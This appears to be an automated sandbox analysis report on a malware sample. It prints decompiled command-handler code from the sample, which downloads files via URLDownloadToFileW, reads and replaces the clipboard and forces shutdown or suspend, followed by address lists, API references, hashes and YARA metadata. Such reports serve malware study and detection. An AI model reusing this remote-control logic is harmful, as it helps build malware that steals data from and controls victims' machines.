									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
									__eax = E00401F95(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = E00401E49( &_v424, __edx, __eflags, 1);
									__eax = E00401F95(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E0041805B( &_v408, __edx, __eax);
									_push(0);
									_push(0);
									__ecx =  &_v408;
									_push(E00401EEB( &_v408));
									__ecx =  &_v428;
									__ecx = E00401E49( &_v428, __edx, __eflags, 2);
									__eax = E00401F95(__eax);
									_push(__eax);
									_push(0);
									__imp__URLDownloadToFileW();
									__eflags = __eax;
									if(__eflags == 0) {
										goto L58;
									}
									goto L106;
								case 0x21:
									while(1) {
										__eflags =  *0x46bd6c - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ecx =  &_v420;
									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
									__eax = E00401F95(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = E00401E49( &_v424, __edx, __eflags, 1);
									__eax = E00401F95(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E0041805B( &_v408, __edx, __eax);
									__ecx =  &_v408;
									__eax = E00401EEB( &_v408);
									__ecx =  &_v428;
									__esi = __eax;
									__eax = E00401E49( &_v428, __edx, __eflags, 2);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = __esi;
									__eax = E00417A4E(__esi);
									__esp = __esp + 0x18;
									__eflags = __al;
									if(__eflags != 0) {
										L58:
										__esp = __esp - 0x18;
										__eax =  &_v420;
										__ecx = __esp;
										E00407350(__ebx, __esp, __edx, __eflags,  &_v420) = E0040B0E2();
										__esp = __esp + 0x18;
									}
									goto L106;
								case 0x22:
									__ecx =  &_v420;
									__ecx = E00401E49( &_v420, __edx, __eflags, 2);
									__eax = E00401F95(__ecx);
									__eax = __eax + 0x10000;
									__ecx =  &_v424;
									__ecx = E00401E49( &_v424, __edx, __eflags, 1);
									__eax = E00401F95(__eax);
									__ebx = 0;
									__ecx =  &_v428;
									__ecx = E00401E49( &_v428, __edx, __eflags, 0);
									E00401F95(__ecx) = MessageBoxW(0, __eax, __eax, __eax);
									goto L126;
								case 0x23:
									__eax = E00413958();
									__ebx = 0;
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 0);
									__edx = "0";
									__ecx = __eax;
									__eax = E00405A6F(__edx);
									__ecx =  &_v424;
									_push(0);
									__eflags = __al;
									if(__eflags == 0) {
										__eax = E00401E49( &_v424, __edx, __eflags);
										__edx = "1";
										__ecx = __eax;
										__eax = E00405A6F(__edx);
										__ecx =  &_v424;
										_push(0);
										__eflags = __al;
										if(__eflags == 0) {
											__eax = E00401E49( &_v424, __edx, __eflags);
											__edx = "2";
											__ecx = __eax;
											__eax = E00405A6F(__edx);
											__eflags = __al;
											if(__eflags == 0) {
												__eax = LoadLibraryA("PowrProf.dll");
												__eax = GetProcAddress(__eax, "SetSuspendState");
												__ecx =  &_v420;
												__esi = __eax;
												__eax = E00401E49( &_v420, __edx, __eflags, 0);
												__edx = "3";
												__ecx = __eax;
												__eax = E00405A6F(__edx);
												_push(0);
												__eflags = __al;
												if(__eflags == 0) {
													__ecx =  &_v420;
													__eax = E00401E49( &_v420, __edx, __eflags);
													__edx = "4";
													__ecx = __eax;
													__eax = E00405A6F(__edx);
													__eflags = __al;
													if(__al != 0) {
														_push(0);
														_push(0);
														_push(1);
														goto L75;
													}
												} else {
													_push(0);
													_push(0);
													L75:
													__eax =  *__esi();
												}
											} else {
												_push(0);
												__ecx =  &_v420;
												__ecx = E00401E49( &_v420, __edx, __eflags, 1);
												__eax = E00401F95(__ecx);
												__eax = E00436769(__ecx, __eax);
												__eax = __eax | 0x00000002;
												__eflags = __eax;
												goto L70;
											}
										} else {
											__ecx = E00401E49( &_v424, __edx, __eflags, 1);
											__eax = E00401F95(__ecx);
											__eax = E00436769(__ecx, __eax);
											__eax = __eax | 0x00000001;
											goto L70;
										}
									} else {
										__ecx = E00401E49( &_v424, __edx, __eflags, 1);
										__eax = E00401F95(__ecx);
										__eax = E00436769(__ecx, __eax);
										L70:
										_pop(__ecx);
										__eax = ExitWindowsEx(__eax, ??);
									}
									goto L126;
								case 0x24:
									L81:
									__eax = OpenClipboard(__ebx);
									__eflags = __eax;
									if(__eax != 0) {
										__esi = GetClipboardData(0xd);
										__edi = GlobalLock(__esi);
										GlobalUnlock(__esi) = CloseClipboard();
										__eflags = __edi;
										0x45f724 =  !=  ? __edi : 0x45f724;
										__ecx =  &_v400;
										__eax = E0040427F(__ebx,  &_v400,  !=  ? __edi : 0x45f724);
										__esp = __esp - 0x18;
										__edx =  &_v404;
										__ecx = __esp;
										__eax = E0041739C(__ebx, __esp, __edx);
										_push(0x6b);
										__ecx = 0x46c780;
										__eax = E00404AA4(__ebx, 0x46c780, __edx, __eflags);
										L106:
										__ecx =  &_v400;
										L107:
										__eax = E00401EF0();
									}
									goto L126;
								case 0x25:
									__eflags = OpenClipboard(0);
									if(__eflags != 0) {
										__eax = EmptyClipboard();
										__ecx =  &_v420;
										__ecx = E00401E49( &_v420, __edx, __eflags, 0);
										__eax = E00402489();
										__eax = __eax + 2;
										__edi = __eax;
										__eax = GlobalLock(__edi);
										__ecx =  &_v424;
										__esi = __eax;
										__ecx = E00401E49( &_v424, __edx, __eflags, 0);
										__eax = E00402489();
										__ecx =  &_v428;
										__ecx = E00401E49( &_v428, __edx, __eflags, 0);
										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
										goto L80;
									}
									goto L126;
								case 0x26:
									__eax = OpenClipboard(0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = EmptyClipboard();
										L80:
										__eax = CloseClipboard();
										goto L81;
									}
									goto L126;
								case 0x27:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
									__eax = E00402489();
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = E00401E49( &_v424, __edx, __eflags, 0);
									__eax = E00401F95(__eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E0040F69B();
									goto L126;
								case 0x28:
									__eax =  &_v404;
									__ebx = 0;
									__ecx =  &_v420;
									_v404 = 0;
									_v408 = 0;
									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
									__eax = E00401F95(__eax);
									__edx =  &_v412;
									__ecx = __eax;
									__eax = E00417111(__eax, __edx,  &_v404);
									__eflags = __eax - 1;
									if(__eax == 1) {
										__edx = _v404;
										__ecx = _v408;
										E0040F69B() = L004394F1(_v408);
										L26:
										_pop(__ecx);
									}
									goto L126;
								case 0x29:
									__eax = E0040A732(__edx);
									goto L126;
								case 0x2a:
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00413CC0(__edx);
									goto L103;
								case 0x2b:
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004117F1(__edx);
									goto L103;
								case 0x2c:
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00405367(__edx);
									goto L103;
								case 0x2d:
									_push(__ecx);
									__esi = 0x46c560;
									__ecx = 0x46c560;
									__eax = E00402489();
									__ecx = 0x46c560;
									__eax = E00401F95(0x46c560);
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = E00401E49( &_v420, __edx, __eflags, 0);
									E00402489() = __eax + 1;
									__ecx =  &_v424;
									__ecx = E00401E49( &_v424, __edx, __eflags, 0);
									__eax = E00401F95(__eax);
									__ecx = 0x46c518;
									__edx = E00401F95(0x46c518);
									__eax = E00410C80(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
									goto L103;
								case 0x2e:
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0040EE3B(__edx);
									goto L103;
								case 0x2f:
									__ecx =  &_v420;
									__eax = E00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00415B9C(__edx);
									L103:
									goto L126;
							}
						}
					}
				}
				L132:
			}

0x004123b9
0x004123b9
0x004123b9
0x004123c9
0x004123cb
0x004123d3
0x004123db
0x004123f8
0x00412402
0x00412407
0x00412412
0x00412417
0x00412424
0x0041242d
0x00412437
0x0041243a
0x0041243c
0x004130ad
0x004130b3
0x004130b6
0x004130c3
0x00000000
0x004130ef
0x004130f8
0x004130fa
0x00413106
0x00413108
0x00000000
0x00000000
0x00413114
0x0041311d
0x0041311f
0x00413125
0x0041312d
0x00413131
0x00413138
0x0041313a
0x00413140
0x00413142
0x00413146
0x0041314c
0x00413150
0x00413157
0x0041315b
0x0041315d
0x00413162
0x00413165
0x00413168
0x0041316d
0x0041316f
0x00413174
0x00413177
0x00413180
0x00413182
0x00413184
0x00000000
0x00000000
0x00413214
0x0041321d
0x0041321f
0x00413227
0x00413230
0x00413232
0x0041323f
0x00000000
0x00000000
0x0041328c
0x00413290
0x00413295
0x00413298
0x004132a0
0x00000000
0x00000000
0x004132ac
0x004132b0
0x004132b5
0x004132b8
0x004132c0
0x00000000
0x00000000
0x004130db
0x004130e0
0x00000000
0x00000000
0x0041324c
0x00413250
0x00413255
0x00413258
0x00413260
0x00000000
0x00000000
0x0041326c
0x00413270
0x00413275
0x00413278
0x00413280
0x00000000
0x00000000
0x00413350
0x00000000
0x00000000
0x00413357
0x00000000
0x00000000
0x0041335e
0x00000000
0x00000000
0x00413321
0x00413323
0x0041332e
0x00413330
0x00413337
0x0041333b
0x0041333d
0x00413340
0x00413345
0x00413347
0x00413349
0x00000000
0x00000000
0x004132ca
0x00000000
0x00000000
0x00413365
0x0041336c
0x00413370
0x00413372
0x00413377
0x0041337a
0x0041337e
0x00413380
0x0041338d
0x0041338f
0x00413399
0x0041339b
0x0041339d
0x004133a3
0x00000000
0x00000000
0x004132d4
0x004132db
0x00413316
0x004132dd
0x004132dd
0x004132df
0x004132e4
0x004132f0
0x004132f6
0x004132f6
0x00000000
0x00000000
0x00413202
0x00000000
0x00000000
0x00413209
0x0041320b
0x0041320c
0x00000000
0x00000000
0x00413197
0x0041319e
0x004131a5
0x004131a9
0x004131ae
0x004131b1
0x004131b4
0x004131bb
0x004131bf
0x004131c4
0x004131c7
0x004131ca
0x004131d1
0x004131d5
0x004131da
0x004131dd
0x004131e0
0x004131e5
0x004131ec
0x004131f1
0x004131f8
0x00000000
0x00000000
0x00000000
0x00000000
0x004130c3
0x00000000
0x00412442
0x00412442
0x00412fbb
0x00412fd8
0x00412fe3
0x00412fed
0x00412ffd
0x00412ffd
0x00413000
0x00413005
0x0041300b
0x00413016
0x00413021
0x0041303e
0x0041305b
0x00413067
0x0041306c
0x00413074
0x00413097
0x00413097
0x004130a3
0x00000000
0x00412448
0x00412448
0x0041244c
0x004133c4
0x004133c4
0x004133c8
0x004133d4
0x004133e0
0x004133ed
0x00412452
0x00412454
0x00000000
0x00412467
0x00412481
0x0041248f
0x0041249d
0x004124f8
0x004124fc
0x00412507
0x0041250b
0x00412514
0x00412520
0x0041252c
0x00412538
0x00412544
0x00412550
0x0041255c
0x00412565
0x0041256e
0x00412586
0x0041258e
0x004125bb
0x004125c0
0x004125c7
0x004125cc
0x004125ce
0x004125d4
0x004125d5
0x00000000
0x004125d5
0x00412590
0x00412592
0x0041259c
0x004125ac
0x0041259e
0x0041259f
0x0041259f
0x0041259c
0x00000000
0x00000000
0x004125e1
0x004125e3
0x004125d7
0x004125d7
0x00000000
0x00000000
0x00412f50
0x00412f54
0x00412f59
0x00412f5c
0x00412f5e
0x00412f60
0x00412f65
0x00412f67
0x00412f6c
0x00412f71
0x00000000
0x00000000
0x00000000
0x00000000
0x004125f1
0x004125f8
0x004125fd
0x00412600
0x00412604
0x00412606
0x00412611
0x00412613
0x0041261d
0x0041261f
0x00412621
0x00412627
0x004133a8
0x004133a8
0x004133ad
0x004133b2
0x004133b6
0x004133bb
0x004133bf
0x00000000
0x00000000
0x00412630
0x00412639
0x0041263b
0x00412647
0x00412649
0x00000000
0x00000000
0x004126d1
0x004126d1
0x00000000
0x00000000
0x00412655
0x0041265e
0x00412660
0x0041266d
0x00000000
0x00000000
0x00412678
0x00000000
0x00000000
0x0041269f
0x0041267a
0x0041267a
0x0041267c
0x0041267c
0x00412685
0x00412687
0x00412694
0x00000000
0x00000000
0x004126a3
0x004126aa
0x004126b3
0x004126b5
0x004126c2
0x004126c8
0x004126cc
0x00000000
0x00000000
0x004126db
0x004126dd
0x004126e9
0x004126eb
0x004126f1
0x004126f5
0x004126fb
0x00412700
0x0041270a
0x0041271d
0x00412723
0x00412727
0x0041272c
0x00000000
0x00000000
0x00412737
0x0041273b
0x00412741
0x00412746
0x0041274b
0x00412751
0x00412759
0x0041275d
0x00412762
0x00412765
0x0041276d
0x00000000
0x0041276d
0x00000000
0x00000000
0x00412779
0x0041277b
0x00412787
0x00412795
0x00000000
0x00000000
0x004127a2
0x004127a6
0x004127ac
0x004127b1
0x004127b8
0x004127c1
0x004127c3
0x004127cf
0x004127d1
0x004127d9
0x004127e2
0x004127e4
0x004127ea
0x004127f0
0x004127f2
0x004127f8
0x004127f8
0x004127f8
0x00412800
0x00412808
0x0041280e
0x00412810
0x00412812
0x00000000
0x00000000
0x0041281d
0x0041281e
0x00412823
0x00412825
0x00412826
0x00412828
0x00412828
0x00000000
0x00000000
0x0041282b
0x0041282f
0x00412834
0x00412837
0x0041283a
0x0041283f
0x00412844
0x00000000
0x00000000
0x0041284e
0x00412853
0x00000000
0x00000000
0x0041285d
0x00412862
0x00000000
0x00000000
0x0041286e
0x00412872
0x00412878
0x0041287d
0x00412882
0x00000000
0x00000000
0x00412891
0x00412891
0x00412892
0x00412897
0x0041289d
0x004128a2
0x004128a5
0x004128a8
0x004128ad
0x004128b2
0x00000000
0x00000000
0x004128c2
0x004128c7
0x004128c9
0x004128ce
0x00412887
0x00412887
0x00000000
0x00000000
0x00412f9a
0x00412f9b
0x00412fa0
0x00412fa6
0x00412fa8
0x00412faa
0x00412faa
0x00000000
0x00000000
0x004128d2
0x004128d4
0x004128d9
0x004128df
0x004128e4
0x004128e9
0x004128ee
0x004128f3
0x004128f6
0x004128fb
0x004128fd
0x004128fe
0x004128ff
0x00412900
0x00412901
0x00412906
0x00412908
0x0041290d
0x00412910
0x00412912
0x00412917
0x0041291d
0x00412928
0x0041291f
0x0041291f
0x00412924
0x0041292f
0x00412931
0x0041293c
0x0041293e
0x00000000
0x00000000
0x00412948
0x0041294e
0x00412953
0x00000000
0x00000000
0x0041295d
0x0041295f
0x00412965
0x0041296b
0x00412970
0x00412973
0x00412976
0x0041297d
0x00412986
0x00412988
0x00412994
0x00412997
0x004129a0
0x004129a2
0x004129a8
0x004129af
0x004129b3
0x004129ba
0x004129bc
0x004129c2
0x004129c8
0x004129ca
0x004129cc
0x00000000
0x00000000
0x004129d9
0x004129da
0x004129df
0x004129f2
0x00000000
0x00000000
0x004129fd
0x004129fd
0x004129fe
0x00412a03
0x00412a09
0x00412a0e
0x00412a11
0x00412a14
0x00412a1b
0x00412a1f
0x00412a24
0x00412a27
0x00412a2f
0x00412a34
0x004128b7
0x004128b7
0x00000000
0x00000000
0x00412a3e
0x00412a47
0x00412a4f
0x00000000
0x00000000
0x00412a5a
0x00412a61
0x00000000
0x00412a6f
0x00412a6f
0x00412a75
0x00000000
0x00000000
0x00412a69
0x00412a69
0x00412a7b
0x00412a7b
0x004133f0
0x004133f5
0x004133f6
0x004133f8
0x004133fa
0x004133ff
0x00413400
0x00413402
0x00413405
0x00413407
0x00413408
0x0041340a
0x0041340f
0x00413410
0x00413412
0x00413414
0x00413417
0x00413418
0x0041341b
0x0041341c
0x00413422
0x00413424
0x00413426
0x00413428
0x0041342e
0x0041342f
0x00413430
0x00413436
0x00413439
0x0041343b
0x0041343c
0x0041343f
0x00413440
0x00413443
0x00413444
0x00413448
0x0041344e
0x00413451
0x00413458
0x0041345a
0x0041345d
0x0041345f
0x00413460
0x00413463
0x00413464
0x00413467
0x00413468
0x0041346a
0x0041346d
0x0041346e
0x00413471
0x00413473
0x00413474
0x00413477
0x00413478
0x0041347b
0x0041347c
0x00413480
0x00413486
0x00413489
0x0041348b
0x0041348c
0x0041348e
0x00413491
0x00413497
0x00413498
0x0041349b
0x0041349c
0x0041349e
0x004134a3
0x004134a4
0x004134a7
0x004134a8
0x004134ab
0x004134ac
0x004134b2
0x004134b4
0x004134b6
0x004134b8
0x004134ba
0x004134bb
0x004134bc
0x004134be
0x004134be
0x004134c1
0x004134c3
0x004134c4
0x004134c6
0x004134c9
0x004134cb
0x004134cc
0x004134ce
0x004134d1
0x004134d3
0x004134d4
0x004134da
0x004134dd
0x004134de
0x004134e1
0x004134e3
0x004134e4
0x004134e7
0x004134e8
0x004134eb
0x004134ec
0x004134ef
0x004134f0
0x004134f0
0x004134f0
0x004134f2
0x004134f5
0x004134f8
0x004134fb
0x004134fc
0x004134fe
0x00413501
0x00413503
0x00413504
0x00413506
0x00413509
0x00413509
0x00413509
0x0041350a
0x0041350d
0x0041350f
0x00413510
0x00413510
0x00413512
0x00413514
0x00413516
0x00413518
0x0041351a
0x0041351b
0x0041351c
0x0041351e
0x00413520
0x00413522
0x00413524
0x00413526
0x00413528
0x0041352a
0x0041352c
0x00413531
0x00413533
0x00413534
0x00413535
0x00413539
0x00413541
0x00413543
0x00413544
0x00000000
0x00000000
0x00412a7c
0x00000000
0x00000000
0x00412a8e
0x00412a8e
0x00412a94
0x00000000
0x00000000
0x00412a88
0x00412a88
0x00412a96
0x00412a98
0x00412aa2
0x00412aa4
0x00412aab
0x00412aaf
0x00412ab6
0x00412ab8
0x00412abd
0x00412abf
0x00412ac4
0x00412aca
0x00412acb
0x00412acc
0x00412ad5
0x00412ad8
0x00412ae1
0x00412ae3
0x00412ae8
0x00412ae9
0x00412aea
0x00412af0
0x00412af2
0x00000000
0x00000000
0x00000000
0x00000000
0x00412b1c
0x00412b1c
0x00412b22
0x00000000
0x00000000
0x00412b16
0x00412b16
0x00412b26
0x00412b2f
0x00412b31
0x00412b38
0x00412b3c
0x00412b43
0x00412b45
0x00412b4a
0x00412b4c
0x00412b51
0x00412b57
0x00412b5b
0x00412b62
0x00412b66
0x00412b68
0x00412b6d
0x00412b70
0x00412b73
0x00412b78
0x00412b7a
0x00412b7f
0x00412b82
0x00412b84
0x00412af8
0x00412af8
0x00412afb
0x00412aff
0x00412b07
0x00412b0c
0x00412b0c
0x00000000
0x00000000
0x00412b91
0x00412b9a
0x00412b9c
0x00412ba8
0x00412bad
0x00412bb9
0x00412bbb
0x00412bc1
0x00412bc3
0x00412bcd
0x00412bd6
0x00000000
0x00000000
0x00412be1
0x00412be6
0x00412be8
0x00412bed
0x00412bf2
0x00412bf7
0x00412bf9
0x00412bfe
0x00412c02
0x00412c03
0x00412c05
0x00412c1d
0x00412c22
0x00412c27
0x00412c29
0x00412c2e
0x00412c32
0x00412c33
0x00412c35
0x00412c50
0x00412c55
0x00412c5a
0x00412c5c
0x00412c61
0x00412c63
0x00412c98
0x00412c9f
0x00412ca6
0x00412caa
0x00412cac
0x00412cb1
0x00412cb6
0x00412cb8
0x00412cbd
0x00412cbe
0x00412cc0
0x00412cc6
0x00412cca
0x00412ccf
0x00412cd4
0x00412cd6
0x00412cdb
0x00412cdd
0x00412ce3
0x00412ce4
0x00412ce5
0x00000000
0x00412ce5
0x00412cc2
0x00412cc2
0x00412cc3
0x00412ce7
0x00412ce7
0x00412ce7
0x00412c65
0x00412c65
0x00412c68
0x00412c71
0x00412c73
0x00412c79
0x00412c7e
0x00412c7e
0x00000000
0x00412c7e
0x00412c37
0x00412c3e
0x00412c40
0x00412c46
0x00412c4b
0x00000000
0x00412c4b
0x00412c07
0x00412c0e
0x00412c10
0x00412c16
0x00412c81
0x00412c81
0x00412c83
0x00412c83
0x00000000
0x00000000
0x00412d88
0x00412d89
0x00412d8f
0x00412d91
0x00412d9f
0x00412da9
0x00412db1
0x00412db7
0x00412dbe
0x00412dc2
0x00412dc6
0x00412dcb
0x00412dce
0x00412dd2
0x00412dd4
0x00412dd9
0x00412ddb
0x00412de0
0x00413189
0x00413189
0x0041318d
0x0041318d
0x0041318d
0x00000000
0x00000000
0x00412cf5
0x00412cf7
0x00412cfd
0x00412d04
0x00412d0d
0x00412d0f
0x00412d14
0x00412d23
0x00412d26
0x00412d2d
0x00412d31
0x00412d38
0x00412d3a
0x00412d41
0x00412d4a
0x00412d65
0x00000000
0x00412d65
0x00000000
0x00000000
0x00412d6e
0x00412d74
0x00412d76
0x00412d7c
0x00412d82
0x00412d82
0x00000000
0x00412d82
0x00000000
0x00000000
0x00412dea
0x00412dec
0x00412df6
0x00412df8
0x00412dfe
0x00412e02
0x00412e09
0x00412e0b
0x00412e10
0x00412e12
0x00412e14
0x00000000
0x00000000
0x00412e1e
0x00412e22
0x00412e26
0x00412e2a
0x00412e2e
0x00412e37
0x00412e39
0x00412e3e
0x00412e42
0x00412e44
0x00412e4a
0x00412e4d
0x00412e53
0x00412e57
0x00412e64
0x00412817
0x00412817
0x00412817
0x00000000
0x00000000
0x00412e6e
0x00000000
0x00000000
0x00412e7a
0x00412e7e
0x00412e83
0x00412e86
0x00412e8e
0x00000000
0x00000000
0x00412e9a
0x00412e9e
0x00412ea3
0x00412ea6
0x00412eae
0x00000000
0x00000000
0x00412eba
0x00412ebe
0x00412ec3
0x00412ec6
0x00412ece
0x00000000
0x00000000
0x00412ed8
0x00412ed9
0x00412ede
0x00412ee0
0x00412ee6
0x00412ee8
0x00412eee
0x00412ef0
0x00412efa
0x00412f01
0x00412f02
0x00412f0d
0x00412f0f
0x00412f1a
0x00412f24
0x00412f26
0x00000000
0x00000000
0x00412f32
0x00412f36
0x00412f3b
0x00412f3e
0x00412f46
0x00000000
0x00000000
0x00412f7c
0x00412f80
0x00412f85
0x00412f88
0x00412f90
0x004130e5
0x00000000
0x00000000
0x00412454
0x0041244c
0x00412442
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 004123DB
GetTickCount.KERNEL32 ref: 0041245B

Strings

8E@, xrefs: 004133C4

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CountEventTick
String ID: 8E@
API String ID: 180926312-787191786
Opcode ID: 8516ac5fc6a3a2d74ffd2756932dd14e2d251496c26aaab0610de99dc60ab54a
Instruction ID: ea4d81ed4f091483c47e61d79a68d374cc238c57229b35d0877b3eec111e029e
Opcode Fuzzy Hash: 8516ac5fc6a3a2d74ffd2756932dd14e2d251496c26aaab0610de99dc60ab54a
Instruction Fuzzy Hash: A0E183316083019BC614FB72D957AEE72A89B95708F40083FF546B71E2EE7C9A44879F

Uniqueness

Uniqueness Score: -1.00%

Function 00404CAB, Relevance: 6.1, APIs: 4, Instructions: 128synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0046C334), ref: 00404D98
CreateThread.KERNELBASE(00000000,00000000,?,0046C2E8,00000000,00000000), ref: 00404DAB
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00404C44,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404DB6
FindCloseChangeNotification.KERNELBASE(00000000,?,?,00404C44,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404DBF

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
String ID:
API String ID: 2579639479-0
Opcode ID: 02c52cb5bce6d97099f4824c0942453cfcfa184bbfd0e7552393798b6c3b6f1e
Instruction ID: 953b0e9f26d888488a0b13dcb1c7857754b01e04207d428095d89ba0379a6afb
Opcode Fuzzy Hash: 02c52cb5bce6d97099f4824c0942453cfcfa184bbfd0e7552393798b6c3b6f1e
Instruction Fuzzy Hash: 034171B1900219AFCB10EBA5CC559FEBBBDAF44314F04016EF952B32D1DB38A9458B64

Uniqueness

Uniqueness Score: -1.00%

Function 00404A08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,?,00000010), ref: 00404A23

Strings

TLS Authentication failed, xrefs: 00404A72
[ERROR], xrefs: 00404A81

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: connect
String ID: TLS Authentication failed$[ERROR]
API String ID: 1959786783-1964023390
Opcode ID: 180a3eec618aef65dfdf02a0dca60cfd7839a15393646ce557064cfd6efdf8ed
Instruction ID: 6a9958cf6c54f084319c11af7f7712e0ea3c55cf2f2f254842a4d7e8f6879e1c
Opcode Fuzzy Hash: 180a3eec618aef65dfdf02a0dca60cfd7839a15393646ce557064cfd6efdf8ed
Instruction Fuzzy Hash: 9C014C7138020197DF08BF6589C65673B599F81344B04402BEE059F2C7EA7ADC44CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0043D15F, Relevance: 4.6, APIs: 3, Instructions: 115COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D217
_free.LIBCMT ref: 0043D233
_free.LIBCMT ref: 0043D23D

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8fd0c840282833bb3a8a99c20dbd839b9e3f6c12aa27e3cced7393c6cf30d85f
Instruction ID: f0011bd8ba433ad85047860dc40924a10541953e35d1305fdf776f14d2f3b5fd
Opcode Fuzzy Hash: 8fd0c840282833bb3a8a99c20dbd839b9e3f6c12aa27e3cced7393c6cf30d85f
Instruction Fuzzy Hash: AF315F36D00210A7CF25AF69E841ABF77B4EF4C764F25409FFD0597240EA399D428798

Uniqueness

Uniqueness Score: -1.00%

Function 00410A30, Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
RegCloseKey.KERNELBASE(00000000), ref: 00410A70

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: c6bf9776d3f6db4a4e763afb8c0664460806c1accb4e7b0a446a59c5926fe9c4
Instruction ID: 441e9820231bba63bf934a94159cc2a1568a4eaa66ed414e7fe82764e71c2100
Opcode Fuzzy Hash: c6bf9776d3f6db4a4e763afb8c0664460806c1accb4e7b0a446a59c5926fe9c4
Instruction Fuzzy Hash: E5014B3180022DFBCF219FA1DC49DEB7F38EF157A1F004165BA08621A1D6759AA5DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410AA7, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
Instruction ID: e89491bdbf644e4e0ba0d344bde8c25a895909b1be654527de0f828c9f06b44b
Opcode Fuzzy Hash: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
Instruction Fuzzy Hash: 7FF0C232040208BFCB00AFA0DC05DEE3B6CEF04B91F104226BD05A61A1EB759F10DA94

Uniqueness

Uniqueness Score: -1.00%

Function 0044765D, Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00447661
_free.LIBCMT ref: 0044769A
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004476A1

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: ca87d83b2957fa9352f777ae552d11f2944e91570d6f08a6d552ed0c63014bb8
